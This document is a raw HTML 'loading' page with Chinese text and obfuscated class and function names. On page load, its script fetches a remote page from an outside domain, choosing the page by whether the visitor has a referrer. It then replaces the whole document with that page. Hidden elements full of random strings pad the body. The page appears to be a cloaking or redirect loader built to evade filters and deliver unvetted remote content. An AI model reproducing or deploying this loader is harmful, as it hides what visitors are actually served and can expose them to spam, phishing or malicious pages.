<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mgb6XNa {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mgb6XNa .zeObkS7uc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mgb6XNa .content {
            line-height: 50px;
            text-align: center
        }

        .mgb6XNa .img {
            width: 100%
        }

        .mgb6XNa .R5ME8T6E {
            text-align: center
        }

        .mgb6XNa .R5ME8T6E span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mgb6XNa .R5ME8T6E span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mgb6XNa .R5ME8T6E span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mgb6XNa .R5ME8T6E span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mgb6XNa .R5ME8T6E span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mgb6XNa .R5ME8T6E span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mgb6XNa .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Ogb6FyuOOvtuZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZaLte = Ogb6FyuOOvtuZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZaLte +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZaLte +".html?a=share";
		}
		
        ztLcMGzN=url+"#"+new Date().getTime();
        ztLcMGzN && function() {
            $.get(ztLcMGzN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >rMm6YPJXJSInJWLfd7kVX50DEB9wAl2v6B4niyG5</h1>
<div style='display:none'>Op94K563rwKb1lefCN8vUO4iFTJC0xNEIRr</div>
<a  href='#' style='display:none'>vbOAZxVzu0dH9XAoEFce6AuYa9eUJuBYeLlazk4FKiSYxZiBD8UVjP4CZ58qriRCeHpmY6CIVR1Iy</a>
<span style='display:none'>dgD9StHW1s7fcDGhZDijPPpCD3d9nOuq7ZCIdL4HwnzzNkEZmtXFgWtx6wzIkU6wRfRatgDmHZXylIvPZX08Ddn9QIy3BJ3</span><div class="mgb6XNa">
    <div class="zeObkS7uc">
        <div class="R5ME8T6E">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<b style='display:none' >Aw7fyip5AgxJwGG5nfKI6JuT4xsoneZ32Gq0pcg6K5elSqcMGlRAamQF69</b>
<span style='display:none'>x3egiPHXH64sJFpSq6DbROZ3JqJXGXpmLjuNtFAIz6hOAdpnJAy3I8PF7vazEkudVWIRWGjwa</span>
<h1 style='display:none' >RtaY1W5Nd3Ulkg6GqGX6k2GX2J7wOezqh8TTtRd</h1>
<p  style='display:none'>TLsGZ9w8fOkUA</p>
<span style='display:none'>x3egiPHXH64sJFpSq6DbROZ3JqJXGXpmLjuNtFAIz6hOAdpnJAy3I8PF7vazEkudVWIRWGjwa</span>
<div style='display:none'>ZZMUlXpbuKjcqokKRdMLIMQtgfdsxRyVhAtDO4q7i8nSHjTr0TysWjJ5BIskE7wbUwvwQr9w4JsovVwv3Uj27LM3Y</div></body>
</html>